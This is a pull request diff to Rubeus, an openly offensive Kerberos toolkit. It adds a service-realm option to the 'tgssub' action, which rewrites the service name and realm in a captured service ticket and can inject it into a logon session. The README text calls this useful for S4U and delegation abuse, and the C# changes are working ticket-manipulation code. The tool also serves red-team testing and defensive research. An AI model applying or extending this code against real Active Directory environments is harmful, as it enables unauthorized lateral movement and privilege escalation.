Merge pull request #153 from GhostPack/tgssub-change

small modify to tgssub

Author: 0xe7

README.md

@@ -81,7 +81,7 @@ Rubeus is licensed under the BSD 3-Clause license.
       | |  \ \| |_| | |_) ) ____| |_| |___ |
       |_|   |_|____/|____/|_____)____/(___/
 
-      v2.2.1
+      v2.2.3
 
 
      Ticket requests and renewals:
@@ -274,8 +274,8 @@ Rubeus is licensed under the BSD 3-Clause license.
             Rubeus.exe hash /password:X [/user:USER] [/domain:DOMAIN]
 
         Substitute an sname or SPN into an existing service ticket:
-            Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:ldap [/ptt] [/luid] [/nowrap]
-            Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:cifs/computer.domain.com [/ptt] [/luid] [/nowrap]
+            Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:ldap [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]
+            Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:cifs/computer.domain.com [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]
 
         Display the current user's LUID:
             Rubeus.exe currentluid
@@ -3705,7 +3705,9 @@ Calculating all hash formats:
 
 The **tgssub** action will take a service ticket base64 blob/file specification and substitute an alternate service name into the ticket. This is useful for S4U abuse and other scenarios.
 
-The `/altservice:X` flag is required and can either be a standalone sname (ldap, cifs, etc.) or a full service principal name (cifs/computer.domain.com). The latter is useful in some S4U2self abuse scenarios with resource-based constrained delegation. See Elad Shamir's [post on the topic](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) for more information.
+The `/altservice:X` argument is required and can either be a standalone sname (ldap, cifs, etc.) or a full service principal name (cifs/computer.domain.com). The former will create a new sname with only the service given, useful for cases where only the hostname is required. The latter is useful in some S4U2self abuse scenarios with resource-based constrained delegation. See Elad Shamir's [post on the topic](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) for more information.
+
+The `/srealm:Y` argument is optional and can be used to change the service realm within the ticket.
 
 The `/ptt` flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The `/luid:0xA..` flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session.
 

Rubeus/Commands/Tgssub.cs

@@ -17,6 +17,7 @@ public void Execute(Dictionary<string, string> arguments)
             string altservice = "";
             LUID luid = new LUID();
             bool ptt = false;
+            string srealm = "";
 
             if (arguments.ContainsKey("/luid"))
             {
@@ -45,6 +46,11 @@ public void Execute(Dictionary<string, string> arguments)
                 Console.WriteLine("\r\n[X] An /altservice:SNAME or /altservice:SNAME/host needs to be supplied!\r\n");
                 return;
             }
+            
+            if(arguments.ContainsKey("/srealm"))
+            {
+                srealm = arguments["/srealm"];
+            }
 
             if (arguments.ContainsKey("/ticket"))
             {
@@ -54,13 +60,13 @@ public void Execute(Dictionary<string, string> arguments)
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    LSA.SubstituteTGSSname(kirbi, altservice, ptt, luid);
+                    LSA.SubstituteTGSSname(kirbi, altservice, ptt, luid, srealm);
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    LSA.SubstituteTGSSname(kirbi, altservice, ptt, luid);
+                    LSA.SubstituteTGSSname(kirbi, altservice, ptt, luid, srealm);
                 }
                 else
                 {

Rubeus/Domain/Info.cs

@@ -12,7 +12,7 @@ public static void ShowLogo()
             Console.WriteLine("  |  __  /| | | |  _ \\| ___ | | | |/___)");
             Console.WriteLine("  | |  \\ \\| |_| | |_) ) ____| |_| |___ |");
             Console.WriteLine("  |_|   |_|____/|____/|_____)____/(___/\r\n");
-            Console.WriteLine("  v2.2.2 \r\n");
+            Console.WriteLine("  v2.2.3 \r\n");
         }
 
         public static void ShowUsage()
@@ -208,8 +208,8 @@ Create a hidden program (unless /show is passed) with random (or user-defined) /
         Rubeus.exe hash /password:X [/user:USER] [/domain:DOMAIN]
 
     Substitute an sname or SPN into an existing service ticket:
-        Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:ldap [/ptt] [/luid] [/nowrap]
-        Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:cifs/computer.domain.com [/ptt] [/luid] [/nowrap]
+        Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:ldap [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]
+        Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:cifs/computer.domain.com [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]
     
     Display the current user's LUID:
         Rubeus.exe currentluid

Rubeus/lib/LSA.cs

@@ -1564,7 +1564,7 @@ public static byte[] RequestFakeDelegTicket(string targetSPN = "", bool display
             return finalTGTBytes;
         }
 
-        public static void SubstituteTGSSname(KRB_CRED kirbi, string altsname, bool ptt = false, LUID luid = new LUID())
+        public static void SubstituteTGSSname(KRB_CRED kirbi, string altsname, bool ptt = false, LUID luid = new LUID(), string srealm = "")
         {
             // subtitutes in an alternate servicename (sname) into a supplied service ticket
 
@@ -1574,19 +1574,29 @@ public static byte[] RequestFakeDelegTicket(string targetSPN = "", bool display
             var parts = altsname.Split('/');
             if (parts.Length == 1)
             {
+                name_string.Add(altsname);
                 // sname alone
-                kirbi.tickets[0].sname.name_string[0] = parts[0]; // ticket itself
-                kirbi.enc_part.ticket_info[0].sname.name_string[0] = parts[0]; // enc_part of the .kirbi
+                kirbi.tickets[0].sname.name_string = name_string; // ticket itself
+                kirbi.enc_part.ticket_info[0].sname.name_string = name_string; // enc_part of the .kirbi
             }
-            else if (parts.Length == 2)
+            else if (parts.Length > 1)
             {
-                name_string.Add(parts[0]);
-                name_string.Add(parts[1]);
+                foreach (var part in parts)
+                {
+                    name_string.Add(part);
+                }
 
                 kirbi.tickets[0].sname.name_string = name_string; // ticket itself
                 kirbi.enc_part.ticket_info[0].sname.name_string = name_string; // enc_part of the .kirbi
             }
 
+            if (!string.IsNullOrWhiteSpace(srealm))
+            {
+                Console.WriteLine("[*] Substituting in alternate service realm: {0}", srealm);
+                kirbi.tickets[0].realm = srealm.ToUpper();
+                kirbi.enc_part.ticket_info[0].srealm = srealm.ToUpper();
+            }
+
             var kirbiBytes = kirbi.Encode().Encode();
 
             LSA.DisplayTicket(kirbi, 2, false, true);